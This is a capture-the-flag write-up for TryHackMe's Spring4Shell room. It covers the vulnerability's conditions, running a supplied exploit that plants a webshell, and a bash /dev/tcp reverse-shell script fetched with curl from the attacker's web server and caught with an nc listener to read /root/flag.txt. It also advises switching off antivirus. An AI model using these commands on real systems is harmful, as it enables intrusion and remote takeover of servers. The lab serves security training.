This is the write up for the Room Spring4Shell on Tryhackme
Make connection with VPN or use the attack box on Tryhackme site to connect to the Tryhackme lab environment
Limitations
Fortunately, despite how commonly used the Spring Framework is, the conditions in which the vulnerability can be exploited are actually fairly limited.
The Spring4Shell vulnerability affects Spring Core before version 5.2, as well as in versions 5.3.0-17 and 5.2.0-19, running on a version of the Java Development Kit (JDK) greater than or equal to 9. The publicly available exploits currently available only work on applications deployed to Apache Tomcat as WARs; however, the Spring Framework maintainers have stated that they believe there may be other ways to exploit the vulnerability.
Current conditions for vulnerability (as stated in Spring’s announcement of the vulnerability) can be summarised as follows:
- JDK 9+
- A vulnerable version of the Spring Framework (<5.2 | 5.2.0-19 | 5.3.0-17)
- Apache Tomcat as a server for the Spring application, packaged as a WAR
- A dependency on the
spring-webmvcand/orspring-webfluxcomponents of the Spring Framework
It is worth noting, however, that these may change over time as other ways to exploit the vulnerability are discovered.
Tasks Spring4Shell
Task 1
Start the machine attached to this task and press complete
Task 2
Read all that is in this task and press complete
Task 3
Download the attached file and unzip it. If you download it with Windows then make sure your virus scanner is off as it will detect it and delete the file. Use the password provided in the task to unzip it
Look at the source website and notice a post request on the website
This website is vulnerable and we can now attack by typing in the following code ( Change ip address to your vulnerable machine)
./exploit.py http://10.10.168.174/
It uploaded the webshell.
You can now enter commands after the cmd=
3.1 [Bonus Question: Optional] Use your webshell to obtain a reverse/bind shell on the target.
Create a script with the following content and call it reverse.sh
#!/bin/bash
bash -i >& /dev/tcp/<YOUR MACHINE IP>/443 0>&1chmod 777 reverse.sh
start a webserver with python
python3 -m http.server 80
Now that we have the script ready we need to upload it to the server
Put this after the cmd=
curl%2010.9.135.33/reverse.sh%20-o%20/dev/shm/reverse.sh
Open a listener on you machine by typing
nc -nlvp 443
Now execute the script on the server by putting this after the cmd=
bash%20/dev/shm/reverse.sh
3.2 What is the flag in /root/flag.txt?
Now that you have a reverse shell you can type in cat /root/flag.txt to get the flag
